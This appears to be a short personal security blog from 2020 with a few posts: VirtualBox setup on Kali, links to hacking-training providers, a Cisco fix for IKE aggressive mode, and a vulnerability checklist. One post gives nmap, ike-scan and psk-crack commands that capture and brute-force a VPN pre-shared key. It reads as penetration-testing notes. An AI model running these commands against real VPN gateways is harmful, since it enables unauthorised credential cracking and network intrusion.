Monday, March 23, 2020

Install VirtualBox 6.1 in Kali 20190318

#echo 'deb [arch=amd64] https://download.virtualbox.org/virtualbox/debian buster contrib' >> /etc/apt/sources.list
#wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- | sudo apt-key add -
#apt-get update
#apt-get install virtualbox-6.1

Sunday, March 15, 2020

Hacking training with labs - updated on 20200315

Offensive Security:
https://www.offensive-security.com/courses-and-certifications/

eLearnSecurity:
https://www.elearnsecurity.com/certification/

Pentester Academy:
https://www.pentesteracademy.com/topics

Pentester Lab:
https://pentesterlab.com/

Mile2:
https://mile2.com/

Tuesday, March 3, 2020

Disable IKE Aggressive Mode to disable Pre-Shared Key

Reference: https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_c4.pdf

(conf) # crypto isakmp aggressive-mode disable

Check VPN IKE Pre-Shared Key vulnerability

Scan it:
#nmap -Pn -Av -sU -p 500 127.0.0.1

Obtain the pre-shared key:
#ike-scan -M 127.0.0.1 -A --id=:cisco -Pvpn1.psk

Crack it:
#psk-crack ./vpn1.psk
#psk-crack --bruteforce=10 --charset=0123456789abcdefghijklmnopqrstuvwxyz ./vpn1.psk

Sunday, March 1, 2020

Hacker101 Checklist

XSS
SQLi
Session Fixation
Clickjacking
File Inclusion
File Upload
Null Terminator